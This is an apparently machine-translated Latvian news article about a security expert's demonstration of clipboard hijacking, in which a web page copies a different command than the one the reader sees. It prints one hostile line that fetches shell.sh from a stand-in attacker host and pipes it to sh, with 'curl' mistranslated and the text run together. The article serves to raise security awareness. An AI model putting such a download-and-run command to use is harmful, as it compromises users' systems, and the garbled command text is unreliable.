- Mēs visi ikdienā kopējam un ielīmējam no interneta, patiesībā neapzinoties riskus.
- To darot, drošības eksperts veltīja laiku, lai parādītu visiem sliktāko scenāriju.
- Internetā saņemto komandu ielīmēšana terminālī ir ātrs veids, kā tikt uzlauztam
- Komandas, kuras, jūsuprāt, ielīmējat terminālī, patiesībā ir ļaunprātīgi kodi.
Tā ir taisnība, ka mēs dzīvojam laikmetā, kurā ātrums ir viss, un galvenais ir ātri sasniegt rezultātus. Tomēr daži cilvēki uz mirkli apstājas un domā par sekām.
Ikdienā miljoniem programmētāju, administratoru un drošības pētnieku veic vienkāršus uzdevumus, piemēram, komandu kopēšanu un ielīmēšanu no tīmekļa lapām tieši sava datora konsolēs.
Lai gan daudzi par to pat nedomā, sekas ir lielākas un bīstamākas, nekā sākotnēji varētu domāt, it īpaši, ja glabājat sensitīvus vai vērtīgus datus.
Pazīstams drošības eksperts atrada laiku, lai padalītos kas patiesībā varētu notikt ja kopējat+ielīmējat saturu no tīmekļa lapām.
Kopēt+ielīmēt ir vienkāršs veids, kā faktiski tikt uzlauztam
Gabriels Frīdlanders, kurš ir drošības izpratnes apmācības platformas Wizer dibinātājs, novilka aizsegu no shēmas, kas liks jums divreiz padomāt, pirms kopēt un ielīmēt komandas no tīmekļa lapām.
Satura kopēšana un ielīmēšana no interneta mūsdienās ir kļuvusi tik izplatīta, ka neviens par to pat nedomā.
Tomēr Frīdlenders brīdina, ka dažas tīmekļa lapas ir maldinošākas, nekā sākumā varētu nojaust, un tas, ko jūs domājat no tā nokopējāt, ļoti atšķiras no tā, ko jūs patiesībā darījāt.
Un sliktākais šajā visā ir tas, ka bez nepieciešamām zināšanām vai norādījumiem upuri savu kļūdu saprot tikai pēc teksta ielīmēšanas, un tad jau var būt par vēlu.
Drošības analītiķis arī izstrādāja nelielu pārbaudi sava emuāra lasītājiem, lai cilvēki patiešām saprastu, cik viegli jūs varat negribot atvērt durvis kibernoziedzniekiem.
Viņš sniedza komandu, kas ir paredzēta kopēšanai, taču attiecīgā patiesība tiek atklāta tikai tad, kad ielīmējat tekstu un redzat, ko patiesībā ievadījāt savā iestatījumā.
Pēc iepriekš redzamajā ekrānuzņēmumā redzamās komandas kopēšanas tās ielīmēšanas rezultāts jūs šokēs, jo tā ir tālu no tā, ko jūs domājāt, ka dublējat.
čokurošanās http://attacker-domain: 8000/shell.sh | shPapildus pilnīgi atšķirīgajai komandai, kas atrodas starpliktuvē, jaunās rindas (vai atgriešanas) rakstzīme beigas nozīmē, ka iepriekš minētais piemērs tiks izpildīts, tiklīdz tas tiks ielīmēts tieši Linux terminālis.
Tāpēc labāk apzināties, kas patiesībā notiek, un uzskatīt to par nopietnu drošības apdraudējumu. Mēs nesakām, ka visas vietnes slēpj ļaunprātīgu saturu, taču ir vērts to ņemt vērā.
Vai esat kādreiz ticis uzlauzts, ielīmējot savā terminālā viltīgas komandas? Dalieties savā pieredzē ar mums komentāru sadaļā zemāk.
